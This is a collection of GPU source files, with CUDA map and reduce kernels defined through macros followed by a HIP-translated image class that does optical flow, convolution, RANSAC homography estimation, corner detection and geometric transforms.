tile[x-xb][y-yb]);\ }\ }\ __syncthreads();\ }\ }\ } /* for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for (int j = 0; j < ; j += BLOCK_ROWS) block[(threadIdx.y+j)*TILE_DIM + threadIdx.x] = idata[(y+j)*width + x]; for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b[col * bMajorStride + row]);\ }\ }\ }\ \ */ static __inline__ __device__ double shfl_down(double var, int delta, int width=warpSize) { int hi, lo; asm volatile( "mov.b64 { %0, %1 }, %2;" : "=r"(lo), "=r"(hi) : "d"(var) ); hi = __shfl_down( hi, delta, width ); lo = __shfl_down( lo, delta, width ); return __hiloint2double( hi, lo ); } static __inline__ __device__ int shfl_down(int var, int delta, int width=warpSize) { return __shfl_down(var, delta, width); } static __inline__ __device__ unsigned int shfl_down(unsigned int var, int delta, int width=warpSize) { int x = __shfl_down(*(int*)&var, delta, width); return *(unsigned int*)(&x); } static __inline__ __device__ float shfl_down(float var, int delta, int width=warpSize) { return __shfl_down(var, delta, width); } #define laneId (threadIdx.x & 0x1f) #define REDUCE_FUN(fun, T, identity) \ /* Each column gets 1 block of threads. TODO currently blocksize must be 1 warp*/\ extern "C" \ __global__ void MAKE_NAME(reduce, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /*__shared__ T buffer[32];\*/\ \ T sum = identity;\ for(int col = threadIdx.y + blockIdx.y * blockDim.y; col < cols; col += blockDim.y * gridDim.y) {\ for(int row = threadIdx.x + blockIdx.x * blockDim.x; row < rows; row += blockDim.x * gridDim.x) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ }\ \ __syncthreads();\ for (int i = 1; i < blockDim.x; i *= 2) {\ T x = shfl_down(sum, i);\ sum = fun(sum, x);\ }\ \ if(laneId == 0) {\ out[blockIdx.x * gridDim.y + blockIdx.y] = sum;\ }\ }\ \ /* Each column gets 1 block of threads. TODO currently blocksize must be 1 warp*/\ extern "C" \ __global__ void MAKE_NAME(reduce_col, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /*__shared__ T buffer[32];\*/\ \ for(int col = threadIdx.y + blockIdx.x * blockDim.y; col < cols; col += blockDim.y * gridDim.x) {\ T sum = identity;\ for(int row = threadIdx.x; row < rows; row += blockDim.x) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ \ __syncthreads();\ for (int i = 1; i < blockDim.x; i *= 2) {\ T x = shfl_down(sum, i);\ sum = fun(sum, x);\ }\ \ if(laneId == 0) {\ out[col] = sum;\ }\ }\ }\ \ \ /*Each row has its own thread. We should make multiple threads per row, but later. TODO */\ extern "C" \ __global__ void MAKE_NAME(reduce_row, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /* __shared__ T buffer[32];*/\ \ int numReducers = blockDim.x * gridDim.x;\ for(int row = threadIdx.x + blockIdx.x * blockDim.x; row < rows; row += numReducers) {\ T sum = identity;\ for(int col = 0; col < cols; col++) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ \ out[row] = sum;\ }\ }\ #include "function_decls.cuh"
efe1adcbdf7e31857da1884ba3e9953dca96eaad.cu
#include <stdio.h> #define MAKE_NAME(prefix, fun, T) prefix ## _ ## fun ## _ ## T #define MAP_FUN_1(fun, T) \ extern "C" \ __global__ void MAKE_NAME(map, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *in, int inMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(in[col * inMajorStride + row]);\ }\ }\ } #define MAP_BLOCK_SIZE 32 #define MAP_FUN_2(fun, T) \ extern "C" \ __global__ void MAKE_NAME(map2, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T *b, int bMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b[col * bMajorStride + row]);\ }\ }\ }\ \ extern "C" \ __global__ void MAKE_NAME(map2_v_s, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T b) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b);\ }\ }\ }\ \ extern "C" \ __global__ void MAKE_NAME(map2_s_v, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T a,\ const T *b, int bMajorStride) {\ for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a, b[col * bMajorStride + row]);\ }\ }\ }\ extern "C" \ __global__ void MAKE_NAME(map2_transpose, fun, T) (int rows, int cols,\ T *out, int outMajorStride,\ const T *a, int aMajorStride,\ const T *b, int bMajorStride) {\ \ int numGroupsX = blockDim.x * gridDim.x;\ int numGroupsY = blockDim.y * gridDim.y;\ int firstBlockX = blockDim.x * blockIdx.x;\ int firstBlockY = blockDim.y * blockIdx.y;\ __shared__ T tile[MAP_BLOCK_SIZE][MAP_BLOCK_SIZE+1];\ \ /*x is row in a, col in b*/\ /*y is col in a, row in b*/\ \ for (int yb = firstBlockY; yb < cols; yb += numGroupsY) {\ for (int xb = firstBlockX; xb < rows; xb += numGroupsX) {\ int ylim = min(cols, yb + MAP_BLOCK_SIZE);\ int xlim = min(rows, xb + MAP_BLOCK_SIZE);\ \ \ /* use threadid.y for x here so that the y loop is on the first blockDim, which means coalesced reads*/\ for (int x = threadIdx.y + xb; x < xlim; x += blockDim.y) {\ for(int y = threadIdx.x + yb; y < ylim; y += blockDim.x) {\ tile[x-xb][y-yb] = b[x*bMajorStride + y];\ }\ }\ \ __syncthreads();\ for(int y = threadIdx.y + yb; y < ylim; y += blockDim.y) {\ for (int x = threadIdx.x + xb; x < xlim; x += blockDim.x) {\ out[x + y*outMajorStride] = fun(a[x + y * aMajorStride], tile[x-xb][y-yb]);\ }\ }\ __syncthreads();\ }\ }\ } /* for(int col = threadIdx.x + blockIdx.x * blockDim.x; col < cols; col += blockDim.x * gridDim.x) {\ for (int j = 0; j < ; j += BLOCK_ROWS) block[(threadIdx.y+j)*TILE_DIM + threadIdx.x] = idata[(y+j)*width + x]; for(int row = threadIdx.y + blockIdx.y * blockDim.y; row < rows; row += blockDim.y * gridDim.y) {\ out[col * outMajorStride + row] = fun(a[col * aMajorStride + row], b[col * bMajorStride + row]);\ }\ }\ }\ \ */ static __inline__ __device__ double shfl_down(double var, int delta, int width=warpSize) { int hi, lo; asm volatile( "mov.b64 { %0, %1 }, %2;" : "=r"(lo), "=r"(hi) : "d"(var) ); hi = __shfl_down( hi, delta, width ); lo = __shfl_down( lo, delta, width ); return __hiloint2double( hi, lo ); } static __inline__ __device__ int shfl_down(int var, int delta, int width=warpSize) { return __shfl_down(var, delta, width); } static __inline__ __device__ unsigned int shfl_down(unsigned int var, int delta, int width=warpSize) { int x = __shfl_down(*(int*)&var, delta, width); return *(unsigned int*)(&x); } static __inline__ __device__ float shfl_down(float var, int delta, int width=warpSize) { return __shfl_down(var, delta, width); } #define laneId (threadIdx.x & 0x1f) #define REDUCE_FUN(fun, T, identity) \ /* Each column gets 1 block of threads. TODO currently blocksize must be 1 warp*/\ extern "C" \ __global__ void MAKE_NAME(reduce, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /*__shared__ T buffer[32];\*/\ \ T sum = identity;\ for(int col = threadIdx.y + blockIdx.y * blockDim.y; col < cols; col += blockDim.y * gridDim.y) {\ for(int row = threadIdx.x + blockIdx.x * blockDim.x; row < rows; row += blockDim.x * gridDim.x) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ }\ \ __syncthreads();\ for (int i = 1; i < blockDim.x; i *= 2) {\ T x = shfl_down(sum, i);\ sum = fun(sum, x);\ }\ \ if(laneId == 0) {\ out[blockIdx.x * gridDim.y + blockIdx.y] = sum;\ }\ }\ \ /* Each column gets 1 block of threads. TODO currently blocksize must be 1 warp*/\ extern "C" \ __global__ void MAKE_NAME(reduce_col, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /*__shared__ T buffer[32];\*/\ \ for(int col = threadIdx.y + blockIdx.x * blockDim.y; col < cols; col += blockDim.y * gridDim.x) {\ T sum = identity;\ for(int row = threadIdx.x; row < rows; row += blockDim.x) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ \ __syncthreads();\ for (int i = 1; i < blockDim.x; i *= 2) {\ T x = shfl_down(sum, i);\ sum = fun(sum, x);\ }\ \ if(laneId == 0) {\ out[col] = sum;\ }\ }\ }\ \ \ /*Each row has its own thread. We should make multiple threads per row, but later. TODO */\ extern "C" \ __global__ void MAKE_NAME(reduce_row, fun, T) (int rows, int cols,\ T *out,\ const T *in, int inMajorStride) {\ /* __shared__ T buffer[32];*/\ \ int numReducers = blockDim.x * gridDim.x;\ for(int row = threadIdx.x + blockIdx.x * blockDim.x; row < rows; row += numReducers) {\ T sum = identity;\ for(int col = 0; col < cols; col++) {\ sum = fun(sum, in[col * inMajorStride + row]);\ }\ \ out[row] = sum;\ }\ }\ #include "function_decls.cuh"
feffac992fac7bfedbdeaa2b7d2fbfa02a9568be.hip
// !!! This is a file automatically generated by hipify!!! #include "../include/common.h" #include "../include/functions.cuh" #include "../include/image.cuh" #include "../include/kernel.h" #include "../libs/stb/stb_image.h" #include "../libs/stb/stb_image_write.h" #include <bits/stdc++.h> #include <hip/hip_runtime.h> #include <thrust/device_vector.h> #include <thrust/host_vector.h> #include <thrust/sort.h> #include <stdexcept> Image::Image(const char *filename, bool grayscale) { _filename = filename; int desiredChannels = 3; if (grayscale) { desiredChannels = 1; } int w, h, c; unsigned char *data = stbi_load(_filename, &w, &h, &c, desiredChannels); if (!data) { return; } _width = w; _height = h; _channels = desiredChannels; _nBytes = w * h * desiredChannels * sizeof(unsigned char); // Allocate space for the host copy. _h_data = (unsigned char *)malloc(_nBytes); for (int i = 0; i < w * h * desiredChannels; i++) { _h_data[i] = data[i]; } // Allocate space for the cuda copy. hipMalloc((unsigned char **)&_d_data, _nBytes); stbi_image_free(data); } Image::Image(const Image &obj) { _device = obj._device; _filename = obj._filename; _width = obj._width; _height = obj._height; _channels = obj._channels; _nBytes = _width * _height * _channels * sizeof(unsigned char); // Allocate space for the host copy. _h_data = (unsigned char *)malloc(_nBytes); for (int i = 0; i < _width * _height * _channels; i++) { _h_data[i] = obj._h_data[i]; } // Allocate space for the cuda copy. hipMalloc((unsigned char **)&_d_data, _nBytes); hipMemcpy(_d_data, obj._d_data, _nBytes, hipMemcpyDeviceToDevice); } Image::~Image(void) { free(_h_data); hipFree(_d_data); } Image Image::operator-(const Image &obj) { // Return if images have different sizes. if (_width != obj._width or _height != obj._height or _channels != obj._channels) { throw std::invalid_argument("images have different sizes"); } Image result(obj); result.setDevice(_device); if (strcmp(_device, _validDevices[0]) == 0) { differenceOnHost(result.getData(), getData(), getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getSize() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( differenceOnDevice), dim3(blocks), dim3(threads), 0, 0, result.getData(), getData(), getWidth(), getHeight(), getChannels()); } return result; } int Image::getChannels() { return _channels; } unsigned char *Image::getData() { if (strcmp(_device, _validDevices[0]) == 0) { return _h_data; } else { return _d_data; } } const char *Image::getDevice() { return _device; } unsigned int *Image::getElement(int index) { unsigned int *values = new unsigned int[_channels]; if (index >= _width * _height) { return NULL; } // Synchronize matrices if needed. // TODO optimise synchronization to avoid to check everytime when on cuda. if (strcmp(_device, _validDevices[1]) == 0 and isSynchronized() == 0) { hipMemcpy(_h_data, _d_data, _nBytes, hipMemcpyDeviceToHost); } for (int c = 0; c < _channels; c++) { values[c] = _h_data[index * _channels + c]; } return values; } unsigned int *Image::getElement(int row, int col) { if (row >= _height or col >= _width) { return NULL; } return getElement(row * _width + col); } const char *Image::getFilename() { return _filename; } int Image::getHeight() { return _height; } int Image::getSize() { return _width * _height * _channels; } int Image::getWidth() { return _width; } bool Image::isSynchronized() { unsigned char *h_d_data_copy = (unsigned char *)malloc(_nBytes); hipMemcpy(h_d_data_copy, _d_data, _nBytes, hipMemcpyDeviceToHost); float epsilon = 1.0E-8; int match = 1; for (int i = 0; i < getSize(); i++) { if (abs(_h_data[i] - h_d_data_copy[i]) > epsilon) { match = 0; break; } } free(h_d_data_copy); return match; } void Image::save(const char *filename) { // Synchronize matrices if needed. if (strcmp(_device, _validDevices[1]) == 0 and isSynchronized() == 0) { hipMemcpy(_h_data, _d_data, _nBytes, hipMemcpyDeviceToHost); } stbi_write_png(filename, _width, _height, _channels, _h_data, _width * _channels); } void Image::setDevice(const char *device) { if (arrayContains(_validDevices, device) == 0) { return; } if (strcmp(device, _device) != 0) { _device = device; if (strcmp(device, _validDevices[0]) == 0) { hipMemcpy(_h_data, _d_data, _nBytes, hipMemcpyDeviceToHost); } else { hipMemcpy(_d_data, _h_data, _nBytes, hipMemcpyHostToDevice); } } } void Image::calcOpticalFlow(int *currentCorners, Image *previousFrame, int *corners, int maxCorners, int levels) { Image *gray = new Image(getFilename(), true); Image *prevGray = new Image(previousFrame->getFilename(), true); gray->setDevice(getDevice()); prevGray->setDevice(getDevice()); if (strcmp(_device, _validDevices[0]) == 0) { unsigned char *currPyramidalScales[levels]; unsigned char *prevPyramidalScales[levels]; // Create the pyramidal scales. for (int l = 0; l < levels; l++) { int levelWidth = gray->getWidth() / pow(2, l); int levelHeight = gray->getHeight() / pow(2, l); currPyramidalScales[l] = new unsigned char[gray->getSize()]; prevPyramidalScales[l] = new unsigned char[prevGray->getSize()]; if (l == 0) { for (int i = 0; i < gray->getSize(); i++) { currPyramidalScales[l][i] = gray->getData()[i]; prevPyramidalScales[l][i] = prevGray->getData()[i]; } } else { scaleOnHost(currPyramidalScales[l], currPyramidalScales[l - 1], 0.5, levelWidth * 2, levelHeight * 2, 1); scaleOnHost(prevPyramidalScales[l], prevPyramidalScales[l - 1], 0.5, levelWidth * 2, levelHeight * 2, 1); } } opticalFLowOnHost(currentCorners, corners, maxCorners, currPyramidalScales, prevPyramidalScales, levels, gray->getWidth(), gray->getHeight()); // Free memory. for (int l = 0; l < levels; l++) { delete[] currPyramidalScales[l]; delete[] prevPyramidalScales[l]; } } else { // Copy corner arrays to device. size_t cornersBytes = maxCorners * sizeof(int); int *d_corners, *d_currCorners; hipMalloc((int **)&d_corners, cornersBytes); hipMalloc((int **)&d_currCorners, cornersBytes); hipMemcpy(d_corners, corners, cornersBytes, hipMemcpyHostToDevice); // Create the pyramidal scales. size_t pyramidBytes = gray->getSize() * sizeof(unsigned char); unsigned char *currPyramidalScales, *prevPyramidalScales; hipMalloc((unsigned char **)&currPyramidalScales, levels * pyramidBytes); hipMalloc((unsigned char **)&prevPyramidalScales, levels * pyramidBytes); int copyBlockSize = 1024; dim3 copyThreads(copyBlockSize, 1); dim3 copyBlocks( (gray->getWidth() * gray->getHeight() + copyThreads.x - 1) / copyThreads.x, 1); for (int l = 0; l < levels; l++) { int levelWidth = gray->getWidth() / pow(2, l); int levelHeight = gray->getHeight() / pow(2, l); if (l == 0) { hipMemcpy(currPyramidalScales, gray->getData(), pyramidBytes, hipMemcpyDeviceToDevice); hipMemcpy(prevPyramidalScales, prevGray->getData(), pyramidBytes, hipMemcpyDeviceToDevice); } else { hipLaunchKernelGGL(( scaleOnDevice), dim3(copyBlocks), dim3(copyThreads), 0, 0, currPyramidalScales + l * gray->getSize(), currPyramidalScales + (l - 1) * gray->getSize(), 0.5, levelWidth * 2, levelHeight * 2, 1); hipLaunchKernelGGL(( scaleOnDevice), dim3(copyBlocks), dim3(copyThreads), 0, 0, prevPyramidalScales + l * gray->getSize(), prevPyramidalScales + (l - 1) * gray->getSize(), 0.5, levelWidth * 2, levelHeight * 2, 1); } } // Determine grid size for parallel operations. int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((maxCorners + copyThreads.x - 1) / copyThreads.x, 1); // Initialise all work on the device asynchronously in depth-first // order. hipLaunchKernelGGL(( opticalFLowOnDevice), dim3(blocks), dim3(threads), 0, 0, d_currCorners, d_corners, maxCorners, currPyramidalScales, prevPyramidalScales, levels, gray->getSize(), gray->getWidth(), gray->getHeight()); hipMemcpy(currentCorners, d_currCorners, cornersBytes, hipMemcpyDeviceToHost); // Free memory. hipFree(d_corners); hipFree(d_currCorners); hipFree(currPyramidalScales); hipFree(prevPyramidalScales); } // Free memory. delete gray; delete prevGray; } void Image::convolution(float *kernel, int kernelSide) { unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } convolutionOnHost(getData(), dataCopy, kernel, kernelSide, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Create a copy of the data on device. hipMalloc((unsigned char **)&dataCopy, _nBytes); hipMemcpy(dataCopy, getData(), _nBytes, hipMemcpyDeviceToDevice); // Copy kernel to device. float *d_kernel; hipMalloc((float **)&d_kernel, kernelSide * kernelSide * sizeof(float)); hipMemcpy(d_kernel, kernel, kernelSide * kernelSide * sizeof(float), hipMemcpyHostToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( convolutionOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), dataCopy, d_kernel, kernelSide, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(d_kernel); hipFree(dataCopy); } } void Image::drawLine(int index1, int index2, int radius, int *color, int colorSize) { if (index1 < 0 or index2 < 0) { return; } int x1 = (int)(index1 / getWidth()); int y1 = (index1 % getWidth()); int x2 = (int)(index2 / getWidth()); int y2 = (index2 % getWidth()); this->drawLine(x1, y1, x2, y2, radius, color, colorSize); } void Image::drawLine(int x1, int y1, int x2, int y2, int radius, int *color, int colorSize) { if (strcmp(_device, _validDevices[0]) == 0) { drawLineOnHost(getData(), x1, y1, x2, y2, radius, color, colorSize, getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); size_t colorBytes = colorSize * sizeof(int); int *d_color; hipMalloc((int **)&d_color, colorBytes); hipMemcpy(d_color, color, colorBytes, hipMemcpyHostToDevice); hipLaunchKernelGGL(( drawLineOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), x1, y1, x2, y2, radius, d_color, colorSize, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(d_color); } } void Image::drawPoint(int index, int radius, int *color, int colorSize) { if (index < 0) { return; } int x = (int)(index / getWidth()); int y = (index % getWidth()); this->drawPoint(x, y, radius, color, colorSize); } void Image::drawPoint(int x, int y, int radius, int *color, int colorSize) { if (strcmp(_device, _validDevices[0]) == 0) { drawPointOnHost(getData(), x, y, radius, color, colorSize, getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); size_t colorBytes = colorSize * sizeof(int); int *d_color; hipMalloc((int **)&d_color, colorBytes); hipMemcpy(d_color, color, colorBytes, hipMemcpyHostToDevice); hipLaunchKernelGGL(( drawPointOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), x, y, radius, d_color, colorSize, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(d_color); } } void Image::findHomography(float *A, int *currentCorners, int *previousCorners, int maxCorners) { const int maxIter = 2000; const int N_POINTS = 3; const int SPACE_DIM = 2; int size = N_POINTS * (SPACE_DIM + 1) * maxIter; float *matrices = new float[size]; float *scores = new float[maxIter]; // Estimate maxIter different rigid transformations. // The algorithm estimates a matrix using a triplet of points. if (strcmp(_device, _validDevices[0]) == 0) { findHomographyRANSACOnHost(matrices, scores, maxIter, currentCorners, previousCorners, maxCorners, getWidth(), getHeight()); } else { // Instantiate matrices on device. size_t matricesBytes = size * sizeof(float); size_t scoresBytes = maxIter * sizeof(float); float *d_matrices, *d_scores; hipMalloc((float **)&d_matrices, matricesBytes); hipMalloc((float **)&d_scores, scoresBytes); // Copy corners on device. // Copy corner arrays to device. size_t cornersBytes = maxCorners * sizeof(int); int *d_currCorners, *d_prevCorners; hipMalloc((int **)&d_currCorners, cornersBytes); hipMalloc((int **)&d_prevCorners, cornersBytes); hipMemcpy(d_currCorners, currentCorners, cornersBytes, hipMemcpyHostToDevice); hipMemcpy(d_prevCorners, previousCorners, cornersBytes, hipMemcpyHostToDevice); // Generate a random list of indices. std::random_device rd; std::mt19937 gen(rd()); std::uniform_int_distribution<> uniform(0, maxCorners); int *randomIndices = new int[N_POINTS * maxIter]; for (int i = 0; i < N_POINTS * maxIter; i++) { randomIndices[i] = uniform(gen); } // Copy random indices to device. size_t randomIndicesBytes = N_POINTS * maxIter * sizeof(int); int *d_randomIndices; hipMalloc((int **)&d_randomIndices, randomIndicesBytes); hipMemcpy(d_randomIndices, randomIndices, randomIndicesBytes, hipMemcpyHostToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((maxIter + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( findHomographyRANSACOnDevice), dim3(blocks), dim3(threads), 0, 0, d_matrices, d_scores, maxIter, d_currCorners, d_prevCorners, maxCorners, d_randomIndices, getWidth(), getHeight()); // Copy result to host. hipMemcpy(matrices, d_matrices, matricesBytes, hipMemcpyDeviceToHost); hipMemcpy(scores, d_scores, scoresBytes, hipMemcpyDeviceToHost); hipFree(d_matrices); hipFree(d_scores); hipFree(d_currCorners); hipFree(d_prevCorners); delete[] randomIndices; hipFree(d_randomIndices); } // Retrieve the best matrix. int bestMatrix = -1; float minError = INFINITY; for (int i = 0; i < maxIter; i++) { if (scores[i] < minError) { int offset = i * (N_POINTS * (SPACE_DIM + 1)); // Avoid nan transformations. if (matrices[offset] == matrices[offset]) { bestMatrix = i; minError = scores[i]; } } } // Copy the best matrix element-wise. int offset = bestMatrix * (N_POINTS * (SPACE_DIM + 1)); for (int i = 0; i < N_POINTS * (SPACE_DIM + 1); i++) { if (minError < INFINITY) { A[i] = matrices[offset + i]; } else { // If the minError is INFINITY, then set the transformation to // the identity matrix to avoid any type of transformation. int side = sqrt(N_POINTS * (SPACE_DIM + 1)); A[i] = int(i % side == (int)i / side); } } delete[] matrices; delete[] scores; } void Image::goodFeaturesToTrack(int *corners, int maxCorners, float qualityLevel, float minDistance) { Image *gradX = new Image(getFilename(), true); Image *gradY = new Image(getFilename(), true); gradX->setDevice(getDevice()); gradY->setDevice(getDevice()); int side; float *sobelX, *sobelY; Kernel::SobelX(&sobelX, &side); Kernel::SobelY(&sobelY); gradX->convolution(sobelX, side); gradY->convolution(sobelY, side); int scoreSize = getWidth() * getHeight(); float *scoreMatrix = new float[scoreSize]; int *keys = new int[scoreSize]; float *values = new float[scoreSize]; if (strcmp(_device, _validDevices[0]) == 0) { cornerScoreOnHost(gradX->getData(), gradY->getData(), scoreMatrix, getWidth(), getHeight()); // Sort values. thrust::host_vector<int> h_keys(scoreSize, 0); thrust::sequence(h_keys.begin(), h_keys.end()); thrust::stable_sort_by_key(scoreMatrix, scoreMatrix + scoreSize, h_keys.begin(), thrust::greater<float>()); thrust::copy(h_keys.begin(), h_keys.end(), keys); thrust::copy(scoreMatrix, scoreMatrix + scoreSize, values); } else { // Copy corner array to device. size_t scoreMatrixBytes = scoreSize * sizeof(float); float *d_scoreMatrix; hipMalloc((float **)&d_scoreMatrix, scoreMatrixBytes); // Determine grid size for parallel operations. int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((scoreSize + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( cornerScoreOnDevice), dim3(blocks), dim3(threads), 0, 0, gradX->getData(), gradY->getData(), d_scoreMatrix, getWidth(), getHeight()); // Sort values. thrust::device_ptr<float> d_values(d_scoreMatrix); thrust::device_vector<int> d_keys(scoreSize, 0); thrust::sequence(d_keys.begin(), d_keys.end()); thrust::stable_sort_by_key(d_values, d_values + scoreSize, d_keys.begin(), thrust::greater<float>()); thrust::copy(d_keys.begin(), d_keys.end(), keys); thrust::copy(d_values, d_values + scoreSize, values); } float threshold = values[0] * qualityLevel; int top = 0; for (int i = 0; i < maxCorners; ++i) { corners[i] = -1; float kValue; int kIndex; bool isDistant; do { kValue = values[top]; kIndex = keys[top]; isDistant = true; // Evaluate the Euclidean distance to the previous corners. int j = 0; while (j < i and isDistant) { int otherIndex = corners[j]; int dx = ((int)otherIndex / getWidth()) - ((int)kIndex / getWidth()); int dy = (otherIndex % getWidth()) - (kIndex % getWidth()); int dist = sqrt(pow(dx, 2) + pow(dy, 2)); isDistant = dist > minDistance; j++; } if (isDistant) { // Add only if score is high enough. if (kValue >= threshold) { corners[i] = kIndex; } } top++; } while (not isDistant); } // Free memory. delete gradX; delete gradY; delete[] sobelX; delete[] sobelY; delete[] scoreMatrix; delete[] keys; delete[] values; } void Image::rotate(double degree) { double rad = degree * (M_PI / 180); unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } rotateOnHost(getData(), dataCopy, rad, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Copy histogram to device. hipMalloc((unsigned char **)&dataCopy, _nBytes); hipMemcpy(dataCopy, _d_data, _nBytes, hipMemcpyDeviceToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( rotateOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), dataCopy, rad, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(dataCopy); } } void Image::scale(float ratio) { // Return if ratio is invalid. if (ratio == 1.0 or ratio < 0.0) { return; } unsigned char *newData; int newWidth = int(getWidth() * ratio); int newHeight = int(getHeight() * ratio); int newBytes = newWidth * newHeight * getChannels() * sizeof(unsigned char); if (strcmp(_device, _validDevices[0]) == 0) { newData = (unsigned char *)malloc(newBytes); scaleOnHost(newData, getData(), ratio, getWidth(), getHeight(), getChannels()); // Update data both on device and on host. free(_h_data); _h_data = newData; hipFree(_d_data); hipMalloc((unsigned char **)&_d_data, newBytes); hipMemcpy(_d_data, _h_data, newBytes, hipMemcpyHostToDevice); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((newWidth * newHeight + threads.x - 1) / threads.x, 1); hipMalloc((unsigned char **)&newData, newBytes); hipLaunchKernelGGL(( scaleOnDevice), dim3(blocks), dim3(threads), 0, 0, newData, getData(), ratio, getWidth(), getHeight(), getChannels()); // Update data both on device and on host. hipFree(_d_data); hipMalloc((unsigned char **)&_d_data, newBytes); hipMemcpy(_d_data, newData, newBytes, hipMemcpyDeviceToDevice); free(_h_data); _h_data = (unsigned char *)malloc(newBytes); hipMemcpy(_h_data, _d_data, newBytes, hipMemcpyDeviceToHost); // Free memory. hipFree(newData); } // Update other attributes. _width = newWidth; _height = newHeight; _nBytes = newBytes; } void Image::translate(int px, int py) { unsigned char *dataCopy; if (strcmp(_device, _validDevices[0]) == 0) { // Create a copy of the data on host. dataCopy = (unsigned char *)malloc(_nBytes); for (int i = 0; i < getSize(); i++) { dataCopy[i] = getData()[i]; } translateOnHost(getData(), dataCopy, px, py, getWidth(), getHeight(), getChannels()); // Free memory. free(dataCopy); } else { // Copy histogram to device. hipMalloc((unsigned char **)&dataCopy, _nBytes); hipMemcpy(dataCopy, _d_data, _nBytes, hipMemcpyDeviceToDevice); int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( translateOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), dataCopy, px, py, getWidth(), getHeight(), getChannels()); // Free memory. hipFree(dataCopy); } } void Image::transpose() { // Return if width and height are different. if (getWidth() != getHeight()) { throw std::invalid_argument("width and height must have the same size"); } if (strcmp(_device, _validDevices[0]) == 0) { transposeOnHost(getData(), getWidth(), getHeight(), getChannels()); } else { int blockSize = 1024; dim3 threads(blockSize, 1); dim3 blocks((getWidth() * getHeight() + threads.x - 1) / threads.x, 1); hipLaunchKernelGGL(( transposeOnDevice), dim3(blocks), dim3(threads), 0, 0, getData(), getWidth(), getHeight(), getChannels()); } }
feffac992fac7bfedbdeaa2b7d2fbfa02a9568be.cu
